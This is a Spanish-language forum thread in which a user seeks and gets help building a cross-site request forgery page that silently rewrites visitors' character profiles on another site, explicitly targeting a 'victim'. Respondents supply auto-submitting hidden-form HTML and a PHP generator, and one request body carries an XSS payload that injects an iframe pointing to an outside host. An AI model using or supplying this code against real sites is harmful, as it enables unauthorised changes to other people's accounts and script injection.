Bueno, quiero hacer que cuando entren a mi página web les haga lo siguiente, en método post se le cambie lo siguiente de la cuenta.
<form action="formulario" action="URL"
Aqui quiero que se envie la solicitud de abajo.
<script>document.submit();</script>
Tengo la siguiente solicitud pero no sé ponerla:
altura=164&peso=60&color_ojos=Verdes&color_pelo=Marron&peinado=Corto&bello=Afeitado&tipo_cabeza=Cuadrado&complexion=Atletico&estado_animo=Inquieto&tipo_rol=Rol+serio%2C+nada+de+Off+Rol&estado_rol=En+Rol%2C+buscando+contacto&procedencia=Estados+Unidos.&apodo=Claight.&nick=ASDA&descripcion_fisica=%3CA+HREF%3D%22.%22%3EXSS+TEST%3C%2FA%3E%0D%0A%3C%2Fpre%3E%0D%0A%3Cpre%3E%0D%0A%3Ciframe+src%3D%22http%3A%2F%2FWww.xD.com%2F%3FComando%22%3E&descripcion_psicologica=Pr%C3%B3ximamente.&historia_conocida=Pr%C3%B3ximamente.&llegadaLS=Pr%C3%B3ximamente.&submit=Actualizar
No entendi para nada, ni como esto es un csrf.... explicate con detalle lo que quieres
Lo que quiero es que cuando uno entre a mi index.php, les envie una petición a la PCU de un servidor, allí le edite todos los campos sin que el se de cuenta.
<form name="form1" action="URL" method="GET">
<input type="hidden" name="altura" value="164">
<input type="hidden" name="color_ojos" value="Verdes">
<!-- Aqui sigues agregando valores -->
</form>
<script>document.forms.namedItem("form1").submit();</script>
Depende si el method es GET o POST. Hay formas para bloquear el CSRF.
Agradezco tú ayuda, ahora una última pregunta, ¿cómo hago que automáticamente le pulse a un botón de la página y aparte que se haga sin que se abra una pestaña nueva?
Cita de: xGaLan en 28 Noviembre 2014, 17:36 PM
Agradezco tú ayuda, ahora una última pregunta, ¿cómo hago que automáticamente le pulse a un botón de la página y aparte que se haga sin que se abra una pestaña nueva?
Para pulsar un boton, creo que puedes simplemente llamar a la funcion.
document.getElementById('id').onclick();El comportamiento de las ventanas puede ser diferente para algunos navegadores. ¿Depende como tienes puesto que se abra la pestaña desde el boton?
Ahora tengo esto, el problema está en que yo quiero pasarle mi CSRF a la victima, entonces esta entra y se le abre la PCU en una nueva pestaña, tampoco se editan los campos en la nueva pestaña, quería que todo estuviese oculto.
<form name="form1" action="http://URL/opciones/editar_personaje" method="POST">
<input type="hidden" name="llegadaLS" value="X es el más fuerte">
<input type="hidden" name="descripcion_psicologica" value="X te ha hackeado bitch.">
document.getElementById('submit').onclick();
</form>
<script>document.forms.namedItem("form1").submit();</script>
Cita de: xGaLan en 28 Noviembre 2014, 17:49 PM
Ahora tengo esto, el problema está en que yo quiero pasarle mi CSRF a la victima, entonces esta entra y se le abre la PCU en una nueva pestaña, tampoco se editan los campos en la nueva pestaña, quería que todo estuviese oculto.
<form name="form1" action="http://URL/opciones/editar_personaje" method="POST">
<input type="hidden" name="llegadaLS" value="X es el más fuerte">
<input type="hidden" name="descripcion_psicologica" value="X te ha hackeado bitch.">
document.getElementById('submit').onclick();
</form>
<script>document.forms.namedItem("form1").submit();</script>
No puedes abrir una pestaña y ocultarsela :/, esa no es la base de CSRF.
Ahora he puesto esto pero no edita nada, se queda la página en blanco.
<?php
$url = "URL/opciones/editar_personaje";
$form["descripcion_fisica"] = "X HACKER";
$form["submit"] = "Actualizar";
echo '<html><body onLoad="document.csrf.submit();">';
echo '<form name="csrf" action="http://'.$url.'" method="POST">';
foreach($form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo '</form></body></html>';
?>
<body onload="document.forms[0].submit()">
Con un CSRF no puedes "clickar" con javascript el botón de la otra página. En todo caso tienes que hacer la misma petición que hace al pulsar dicho botón.
Esto no es un csrf... es un html normal y corriente...
Esto es desarrollo web
usa etiquetas GeSHi al publicar código
Movido a desarrollo web